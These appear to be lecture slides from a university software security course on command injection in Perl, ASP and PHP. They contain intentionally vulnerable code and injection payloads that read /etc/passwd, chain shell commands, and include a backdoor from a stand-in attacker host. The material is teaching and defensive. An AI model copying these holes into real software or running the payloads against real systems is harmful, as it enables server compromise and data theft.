Software Security

Lecture 4
Fang Yu
Dept. of MIS,
National Chengchi University
Spring 2011
Outline

Today we will have Adam presenting how to
attack authentication (Ch6)

Before his presentation, I will continue with
Command Injections (Ch9), and I will also
present my recent research on how to prevent
and remove injection vulnerabilities

The rest of your presentations have been
scheduled. Please check the course web page
and plan ahead. Let me know if you have any
questions.

The course website:

http://soslab.nccu.edu.tw/Courses.html
Injecting Code II
Chapter 9
The Web Application Hacker’s
Handbook
Interpreted Languages


Recall that an interpreted language is one
whose execution involves a runtime
component that interprets the code of the
language and carries out the instructions
that it contains
For example, SQL, Perl, ASP, PHP, etc.
Interpreted Languages

In most applications, the code processed by
the interpreter is a mix of instructions written
by a programmer and data supplied by a
user.

An attacker can supply crafted input that
breaks out of the data context, usually by
supplying some syntax that has a special
significance within the grammar of the
interpreted language.
Command Injection Attacks

Main problem: Incorrect or completely missing
validation of user input, which results in the
execution of commands on the server

We discussed SQL injection last
week. Today we will discuss OS command,
Web scripting language, SOAP and SMTP
injection attacks.
OS command: Injecting via
Perl

Consider a Perl CGI script that allows
administrators to specify a directory and
view a summary of its disk usage
#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html("");
print "<pre>";
# Base command; the user-supplied "dir" parameter is appended unvalidated
my $command = "du -h --exclude php* /var/www/html";
$command = $command.param("dir");
# Backticks pass the whole string to the shell and capture its output
$command = `$command`;
print "$command\n";
print end_html;

When used as intended:
Injecting via Perl

“|” is used to redirect the output of a process
to the input of another process

This enables multiple commands to be
chained together

Inject code: (cat /etc/passwd)
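
A hardened counterpart to the disk-usage script above, as an added example that is not from the lecture or the book: it checks the dir value against an allowlist, confines it to the web root, and runs du from an argument list so that no shell ever parses the input. The names resolve_dir and disk_usage and the sample inputs are assumptions made for this example.

```perl
#!/usr/bin/perl
# Added example: hardened version of the disk-usage script (not the book's code).
use strict;
use warnings;
use Cwd qw(abs_path);

my $BASE = '/var/www/html';    # web root used by the command on the slide

# Return the canonical directory if $dir is a plain path that stays
# inside $BASE; return nothing (undef) otherwise.
sub resolve_dir {
    my ($dir) = @_;
    return unless defined $dir;
    # Allowlist: segments of letters, digits, '_', '.', '-' only (no shell syntax).
    return unless $dir =~ m{\A/?[A-Za-z0-9_.-]+(?:/[A-Za-z0-9_.-]+)*/?\z};
    return unless -d "$BASE/$dir";          # must be an existing directory
    my $base = abs_path($BASE);
    my $real = abs_path("$BASE/$dir");      # resolves '..' and symlinks
    return unless defined $base && defined $real;
    return unless $real eq $base || index($real, "$base/") == 0;
    return $real;
}

# Run du from an argument list: no shell is started, so '|', ';' or '&&'
# in a value can never be interpreted as command syntax.
sub disk_usage {
    my ($path) = @_;
    open(my $fh, '-|', 'du', '-h', '--exclude', 'php*', '--', $path)
        or die "cannot run du: $!";
    local $/;                               # slurp all output at once
    my $out = <$fh>;
    close $fh;
    return $out;
}

# Constructed sample inputs: an intended value, the slide's injection
# string, and a path that tries to climb out of the web root.
for my $input ('/admin', '/admin | cat /etc/passwd', '/../../etc') {
    my $path = resolve_dir($input);
    print "'$input' => ", defined($path) ? "accepted as $path\n" : "rejected\n";
    print disk_usage($path) if defined($path);
}
```

The intended value is accepted only if that directory exists under the web root; the other two inputs are rejected before du is ever started.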
OS Command: Injecting via ASP

Consider an ASP script that allows administrators to
view the contents of a requested log file
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' type the log file
szCMD = "type c:\inetpub\wwwroot\logs\" & Request.Form("FileName")
szTempFile = "C:\" & oFileSys.GetTempName()
' cmd executes the command
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>

When used as intended: (submit last5.log)

Use && to batch multiple commands together

Last5.log && dir c:\
Dynamic Execution
Vulnerabilities

The PHP function eval() is used to
dynamically execute code that is passed to
the function at runtime

Consider a search function that enables
users to create stored searches:
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh

The server-side implementation:
$storedsearch = $_GET['storedsearch'];
// creates a mysearch variable with the value wahh
eval("$storedsearch;");
Dynamic execution in PHP

The semicolon character can be used to
batch commands together in a single
parameter.

For example, to retrieve the contents of the
file /etc/passwd, you could use either the
file_get_contents or the system command:
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20echo%20file_get_contents('/etc/passwd')
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20system('cat%20/etc/passwd')
File Inclusion Attacks

Consider an application that delivers
different content to people in different
locations

A request looks like:
https://wahh-app.com/main.php?Country=US

The application processes as follows:
$country = $_GET['Country'];
include( $country . '.php' );
File Inclusion Attacks

If the request has been intercepted:
https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor

The server side may include an arbitrary
remote file
$country = $_GET['Country'];
// with the request above, this is equivalent to:
include( 'http://wahh-attacker.com/backdoor' . '.php' );
Quiz

What’s the main cause of injection
vulnerabilities?

How to prevent injection vulnerabilities?

Let’s talk a little bit about Stranger
Next week

We will have Juilette presenting Attacking
Session Management (Chapter 7), and Jorina
presenting Attacking Access Controls
(Chapter 8)

We will also have Hsing Huang presenting
Burp Suite, a tool set for analyzing and
attacking web applications